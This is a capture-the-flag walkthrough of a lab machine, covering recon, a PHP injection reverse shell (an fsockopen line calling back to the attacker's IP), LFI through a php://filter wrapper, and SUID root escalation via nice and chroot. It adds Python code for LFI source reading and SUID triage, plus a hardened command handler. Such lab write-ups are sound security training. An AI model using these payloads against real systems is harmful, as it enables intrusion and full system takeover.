Uncovering Vulnerabilities: Command Injection Penetration Testing

In this video, we will be diving deep into the world of command injection penetration testing. Command injection is a type of vulnerability that allows an attacker to execute arbitrary commands on a system. By uncovering such vulnerabilities through thorough testing, we can prevent potential security breaches and protect our systems from malicious attacks.

During this tutorial, you will learn about the importance of conducting command injection penetration testing, the common techniques and tools used in the process, and how to effectively identify and remediate vulnerabilities in your system.


Identify the target

As usual, I identified the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

My IP address is 10.0.2.15 and that of the target is 10.0.2.61.

Scan open ports

Next, I scanned the open ports on the target machine. Doing so will give us an idea of the exposed services on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 10.0.2.61

Enumerate web server

I checked the webserver at first.

The default page contained two links. The TEST link redirects to port 8080, while the Production link gave me the following page.

Looking at the inputs, the form asks for a command and a code. So, I used an arbitrary code (9001) and a valid Linux command, 'id'.

However, this didn't give me any command execution. But we do see some results here. For example, there is now a new GET parameter "out". Similarly, the response shows the date and time and the IP address of my machine. So, we can guess that server-side variables are being expanded into the page. Therefore, I tried executing some PHP code.

The screenshot above confirmed that we can execute PHP code. So, I used the following payload inside the PHP syntax to get a reverse shell. Before sending it, I listened on port 9001 for the reverse shell.

nc -nlvp 9001

$sock=fsockopen("10.0.2.15",9001);exec("bash <&3 >&3 2>&3");

Finally, I got the shell. Next, I upgraded it to a fully interactive shell using the following link.

Upgrade to an intelligent reverse shell

Bonus: Local File Inclusion

As I told you earlier, there is a new GET parameter "out". Interestingly, the parameter allowed local file inclusion.

So, we can check the techniques from the following reference.

Only the technique to read the source code worked. This is because the user www-data didn't have access to the log files needed for log poisoning. Similarly, some of the PHP wrappers and plugins that the other techniques rely on aren't enabled.

php://filter/convert.base64-encode/resource=sendcommand.php
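As an added example (not code from the walkthrough or from the target machine), here is a small Python client that builds the php://filter wrapper, sends it in the "out" parameter and base64-decodes the response. It runs offline against a constructed stand-in of the vulnerable page; the stand-in's source text, the /index.php path and the localhost port are assumptions. Point fetch_source at the real base URL to use it against a target.

```python
import base64
import re
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

FILTER_PREFIX = "php://filter/convert.base64-encode/resource="


def filter_payload(resource):
    """Wrap the file in the base64 filter so include() returns its bytes instead of running it."""
    return FILTER_PREFIX + resource


def build_url(base, param, resource):
    """URL-encode the wrapper into the vulnerable GET parameter."""
    return base + "?" + urllib.parse.urlencode({param: filter_payload(resource)})


def decode_filter_response(body):
    """Pull the longest base64 run out of the HTML and decode it. Heuristic: if the
    page prints letters directly adjacent to the blob, trim them before decoding."""
    runs = re.findall(rb"[A-Za-z0-9+/]{20,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in response")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


def fetch_source(base, param, resource):
    """Request the file through the LFI and return its decoded source."""
    with urllib.request.urlopen(build_url(base, param, resource), timeout=5) as resp:
        return decode_filter_response(resp.read())


# --- constructed stand-in for the target so the example runs offline -----------
FAKE_SOURCE = (
    b"<?php\n"
    b"// constructed stand-in, not the machine's real sendcommand.php\n"
    b"echo shell_exec($_GET['command']);\n"
)


class FakeLFIApp(BaseHTTPRequestHandler):
    """Mimics a page doing include($_GET['out']) on the one file we know about."""

    def do_GET(self):
        query = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        out = query.get("out", [""])[0]
        if out == FILTER_PREFIX + "sendcommand.php":
            body = b"<html><body><pre>" + base64.b64encode(FAKE_SOURCE) + b"</pre></body></html>"
        else:
            body = b"<html><body>Warning: include(): failed to open stream</body></html>"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def demo():
    """Start the fake app on a random localhost port and read sendcommand.php through it."""
    srv = HTTPServer(("127.0.0.1", 0), FakeLFIApp)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        base = f"http://127.0.0.1:{srv.server_address[1]}/index.php"  # path is an assumption
        return fetch_source(base, "out", "sendcommand.php")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo())
```

The longest-base64-run heuristic is what you usually want, because include() dumps the encoded file straight into the page among the surrounding HTML; if nothing decodes cleanly, inspect the raw body rather than trusting the regex.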

After base64-decoding the output, we see that the command field isn't validated at all before it is executed, which is why we could run remote commands as we did earlier.
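To make the "isn't validated" point concrete, the following is an added example written in Python, not the machine's PHP: a handler that passes the command field straight to a shell (the pattern the decoded source exposes), beside one that maps the field onto a fixed allowlist and checks the code field as a number. The allowlist entries are assumptions for the demo.

```python
import shlex
import subprocess

# Commands the form is meant to offer. Constructed for this example; the real
# application's command set is not known from the walkthrough.
ALLOWED_COMMANDS = {
    "echo": ["echo", "ok"],
    "date": ["date"],
    "uptime": ["uptime"],
}


def run_vulnerable(command, code):
    """What the target effectively does: the user's string reaches a shell untouched,
    so anything after ';' or inside $(...) becomes part of the executed command."""
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def run_hardened(command, code):
    """Map the user's choice onto a fixed argv and never hand the string to a shell.
    The 'code' field is validated as a short integer rather than echoed back."""
    if not code.isdigit() or len(code) > 6:
        raise ValueError("code must be a short number")
    argv = ALLOWED_COMMANDS.get(command.strip())
    if argv is None:
        raise ValueError("command not permitted: " + shlex.quote(command))
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    print(run_vulnerable("echo ok; echo injected", "9001"))
    print(run_hardened("echo", "9001"))
    try:
        run_hardened("echo; echo injected", "9001")
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist also closes the PHP code execution seen earlier: the hardened handler never evaluates the string, it only uses it as a dictionary key.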

Privilege Escalation

Finally, it came to the part to escalate privileges. There were two users, ppp and fox. However, I couldn't find any way to escalate to either of them. Interestingly, when I looked at the SUID binaries, there were two binaries that could give me root access.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

Using nice: https://gtfobins.github.io/gtfobins/nice/#suid

nice bash -p

Using chroot: https://gtfobins.github.io/gtfobins/chroot/#suid

chroot / bash -p
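As an added example (not part of the original walkthrough), this Python script reproduces the find -perm -4000 step, restricting it to regular files, and triages the hits against a constructed subset of the GTFOBins SUID list, so binaries like nice and chroot stand out immediately. The directory tree it walks is constructed for the demo; run find_suid("/") on a real box.

```python
import os
import stat
import tempfile
from pathlib import Path

# Binaries GTFOBins documents with a SUID escalation. Constructed subset for this
# example; consult https://gtfobins.github.io for the maintained list.
GTFOBINS_SUID = {
    "bash", "sh", "nice", "chroot", "find", "env", "cp", "mv",
    "python3", "perl", "vim", "less", "more", "awk",
}


def find_suid(root="/"):
    """Equivalent of `find / -perm -4000 -type f`: walk the tree and keep regular
    files with the setuid bit, skipping anything we cannot stat."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            try:
                st = path.lstat()  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def triage(paths):
    """Split SUID files into ones GTFOBins can turn into a root shell and the rest."""
    report = {"gtfobins": [], "other": []}
    for p in paths:
        bucket = "gtfobins" if p.name in GTFOBINS_SUID else "other"
        report[bucket].append(p.name)
    for bucket in report:
        report[bucket].sort()
    return report


def demo():
    """Build a throwaway tree with a few setuid files (no root is needed to set the
    bit on files you own) and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        bin_dir = Path(tmp) / "usr" / "bin"
        bin_dir.mkdir(parents=True)
        for name, suid in [("nice", True), ("chroot", True), ("passwd", True), ("ls", False)]:
            f = bin_dir / name
            f.write_text("#!/bin/sh\nexit 0\n")
            f.chmod(0o4755 if suid else 0o755)
        return triage(find_suid(tmp))


if __name__ == "__main__":
    print(demo())  # {'gtfobins': ['chroot', 'nice'], 'other': ['passwd']}
```

Anything in the "other" bucket still deserves a look (custom SUID binaries are a classic CTF and real-world foothold), but the "gtfobins" bucket is where a one-liner like nice bash -p or chroot / bash -p applies directly.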

I guess this explains the name of the machine. Lastly, I got both flags.
